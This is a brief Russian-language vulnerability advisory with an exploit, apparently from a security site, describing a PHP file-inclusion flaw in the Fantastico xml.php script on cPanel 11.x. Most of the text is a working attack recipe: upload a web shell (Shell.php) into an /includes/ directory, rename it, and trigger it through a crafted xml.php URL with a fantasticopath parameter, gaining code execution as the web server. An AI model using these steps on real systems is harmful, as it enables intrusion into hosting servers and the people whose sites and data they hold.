Программа: Cpanel 11.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных сценарием xml.php. Удаленный пользователь может выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Эксплоит:

Сначала создайте директорию /includes/ и загрузить Shell.php в /includes/.
Затем переименуйте его в enc_licensing_servers.php.

http://xxx.com:2082/frontend/x/fantastico/includes/xml.php?fantasticopath=/home/user



Оставить мнение